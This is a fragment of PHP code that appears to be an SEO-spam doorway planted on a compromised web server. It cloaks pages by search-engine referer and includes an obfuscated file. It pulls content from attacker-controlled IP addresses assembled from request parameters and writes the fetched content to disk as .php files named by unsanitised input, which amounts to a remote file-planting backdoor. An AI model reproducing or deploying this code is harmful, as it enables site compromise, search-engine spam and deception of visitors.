$b)
{
$_GET["id"] = $b;
}
$x1=3;
$xx1=5;
$tpl = "xxx";
$keyword = str_replace("-", " ", $_GET["id"]);
$keyword = str_replace(" ", "+", $keyword);
$s = dirname($_SERVER['PHP_SELF']);
if ($s == '\\' | $s == '/') {$s = ('');}
$s = $_SERVER['SERVER_NAME'] . $s;
$today = "20211203-";
include("checkmob.php");
if(is_mobile() >0 ) $mobiledevice = 11;
if ((strpos($_SERVER['HTTP_REFERER'], "google.")) OR (strpos($_SERVER['HTTP_REFERER'], "yahoo.")) OR (strpos($_SERVER['HTTP_REFERER'], "bing.")))
{
$tpl = $_GET["id"].".php.tpl";
$tpl = file($tpl);
$tpl = chop($tpl[0]);
include("nhn2t5ui2ioz");
exit;
}
else
{
$myname = $_GET["id"].".php";
if (file_exists($myname))
{
$html = file($myname);
$html = implode($html, "");
echo $html;
exit;
}
}
//$num_temple = rand(1,9);
if (!file_exists("xyz.txt"))
{
$file = fopen("xyz.txt", "w");
fwrite($file, "1");
fclose($file);
}
$tpl = file("xyz.txt");
$num_temple = chop($tpl[0]);
$newtpl = $num_temple + 1;
if ($newtpl > 10) $newtpl = 1;
$outtpl = fopen("xyz.txt", "w");
fwrite($outtpl, $newtpl);
fclose($outtpl);
$tpl = file("tpl$num_temple.html");
$keyword = str_replace("-", " ", $_GET["id"]);
$keyword = chop($keyword);
$keyword = ucfirst($keyword);
$query_pars = $keyword;
$query_pars_2 = str_replace(" ", "+", chop($query_pars));
$query_pars_2 = mb_strtolower($query_pars_2);
$text = "";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$_GET["looping"].".181.21.126/".$_GET["fn"].".php?pass=$apass&q=$_GET[id]");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
$text = curl_exec($ch);
curl_close($ch);
if (strlen($text)<5000) $text = file_get_contents("http://".$_GET["looping"].".181.21.126/".$_GET["fn"].".php?pass=$apass&q=$_GET[id]");
if (strlen($text)<5000)
{
$url = $_GET["looping"].".181.21.126";
$fp = fsockopen($url, 80, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)
\n";
} else {
$req = "/".$_GET["fn"].".php?pass=$apass&q=$_GET[id]";
$out = "GET $req HTTP/1.1\r\n";
$out .= "Host: www.example.com\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$text = $text.fgets($fp, 128);
}
fclose($fp);
}
}
$zzzzz = $_GET["world"];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$zzzzz.45.76.20/input/page.php?id=$today");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
$text2 = curl_exec($ch);
curl_close($ch);
$text = $text."
\n\n\n\n".$text2;
$html = implode ("\n", $tpl);
$html = str_replace("{keyword}", $keyword, $html);
$html = str_replace("{manytext_bing}", $text, $html);
if (strlen($text)>5000)
{
$out = fopen($myname, "w");
fwrite($out, $html);
fclose($out);
$out = fopen($myname.".tpl", "w");
fwrite($out, $num_temple);
fclose($out);
}
else exit;
echo $html;
?>